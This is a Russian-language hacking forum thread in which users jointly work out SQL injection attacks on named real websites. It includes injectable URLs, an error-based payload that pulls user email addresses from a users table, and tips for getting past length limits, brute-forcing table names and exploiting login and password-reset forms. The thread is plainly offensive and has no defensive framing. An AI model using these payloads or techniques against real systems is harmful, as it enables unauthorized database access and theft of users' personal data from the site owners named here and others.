 |
|
01.01.2015, 19:31
|
|
Участник форума
Регистрация: 08.01.2005
Сообщений: 178
С нами:
11229386
Репутация:
438
|
|
Сообщение от faza02
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
Сообщение от Cennarios
Во первых попробовать так: `information_schema`.xxx.
Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
|
|
|
02.01.2015, 16:24
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Код:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
Там parameter length constraint mechanism. Как обойти для вывода? |
|
|
|
02.01.2015, 16:46
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от vikler
Код:
http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27
Там parameter length constraint mechanism. Как обойти для вывода? чтобы не мучаться с этим, есть еще post sqli в форме входа
http://hollywoodnewswire.net/scripts/login.php
Сообщение от x_Lex
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
тогда вспоминайте, мне данные способы неизвестны.
|
|
|
|
02.01.2015, 17:21
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от x_Lex
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema
Брут!
|
|
|
|
02.01.2015, 18:35
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Сообщение от faza02
чтобы не мучаться с этим, есть еще post sqli в форме входа
http://hollywoodnewswire.net/scripts/login.php
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
|
|
|
|
03.01.2015, 13:36
|
|
Участник форума
Регистрация: 05.01.2012
Сообщений: 204
С нами:
7553846
Репутация:
5
|
|
Есть запрос "
Код:
/ru/users/?brands%5B%5D=9+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cusers.email%2C0x27%2C0x7e%29+from+%60dbname%60.users+Order+by+id+limit+4%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
выводит:
Код:
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row' in /
куда копать? |
|
|
|
03.01.2015, 14:29
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от sysjuk
куда копать?
group_concat(users.email)
Сообщение от vikler
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?
error-based. однако, там тоже запрос режется, нужно узнать версию и выбрать самый короткий вектор
https://rdot.org/forum/showthread.php?t=325
например:
Код:
XPATH syntax error: '.73-log5.1.73-log'
|
|
|
|
03.01.2015, 21:40
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Так какой же вектор применим к этому случаю?
Код:
xttp://www.wyrgorod.ru/shop/subcategory_10(*)_0.html
Error-based, который использовал BigBear ничего не дал, может быть это просто ошибка? |
|
|
|
03.01.2015, 21:43
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'
не получается найти нужное направление, error based не помогает, что то можно придумать?
Код HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
не выдает ошибки |
|
|
|
03.01.2015, 22:35
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами:
7278806
Репутация:
26
|
|
Сообщение от Br@!ns
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=noscript'
не получается найти нужное направление, error based не помогает, что то можно придумать?
Код HTML:
http://www.childsplayclothing.co.uk/designers/preen-mini?PageSpeed=n')+AND+(order+by+1
не выдает ошибки этож Magento, а какой скуле может быть речь?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
